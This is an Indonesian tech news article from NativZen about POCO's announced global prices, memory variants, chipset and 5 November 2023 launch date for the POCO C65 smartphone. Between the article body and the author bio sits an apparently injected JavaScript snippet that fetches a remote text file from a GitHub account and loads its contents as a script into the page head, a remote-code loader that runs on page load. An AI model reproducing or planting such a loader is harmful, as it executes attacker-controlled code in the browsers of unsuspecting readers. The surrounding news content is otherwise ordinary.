NativZen
Advertising Area

POCO Bagikan Harga Jual POCO C65 di Pasar Global

Melalui platform X, POCO membagikan sebuah poster mengenai POCO C65, yang di dalamnya tertulis harga hape tersebut di pasar global.

Advertising Area

NATIVZEN.com – Di pasar Indonesia, POCO pada awal bulan September tahun lalu telah meluncurkan POCO C40. Smartphone ini menawarkan dua keunggulan, yakni baterai berkapasitas 6000 mAh dan layar dengan diagonal 6,71 inci.

Kini, POCO bersiap-siap untuk segera mengumumkan smartphone seri C terbarunya. Perangkat yang dimaksud adalah POCO C65, yang baru-baru ini sudah terlihat di berbagai platform sertifikasi.

Menariknya, belum diumumkan secara resmi, POCO telah mengungkap harga global POCO C65. Tak hanya itu, POCO juga secara gamblang juga mengungkap tanggal untuk peluncuran smartphone tersebut.

Berkicau di platform X (sebelumnya Twitter), akun POCO Global membagikan poster yang mengungkap harga POCO C65. Akan ada dua varian memori yang ditawarkan oleh POCO, yakni 6 GB/128 GB dan 8 GB/256 GB.

POCO C65 dengan RAM 6 GB dan penyimpanan internal 128 GB akan dibanderol dengan harga perkenalan sebesar US$ 109 atau setara Rp1,7 juta. Sedangkan RAM 8 GB dengan penyimpanan 256 GB dibanderol US$129 atau setara Rp2,1 juta.

Sementara itu, POCO C65 terbaru dari produsen smartphone asal Cina ini akan diluncurkan pada 5 November 2023. Dari poster yang dibagikan juga mengonfirmasi bahwa hape ini akan dilengkapi chipset Helio G85.

Di bagian belakang, ponsel pintar ini akan menampilkan pengaturan tiga buah kamera berbasiskan teknologi AI, dan kamera utamanya adalah 50 MP. Sayangnya, hanya itu informasi yang dibagikan POCO di platform media sosial.

Sebelumnya, hape ini telah muncul di sejumlah platform sertifikasi seperti NBTC, TDRA, IMDA, dan FCC. Laporan lainnya juga mengisyaratkan bahwa POCO C65 kemungkinan merupakan versi model Redmi 13C yang diganti mereknya.

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)
Avatar photo

Eko Lanue Ardie

co-Founder & Pimpinan Redaksi nativzen (www.nativzen.com); Jurnalis di industri teknologi dan gadget yang sudah berkecimpung sejak 2010.

Advertising Area
Advertising Area

Your Header Sidebar area is currently empty. Hurry up and add some widgets.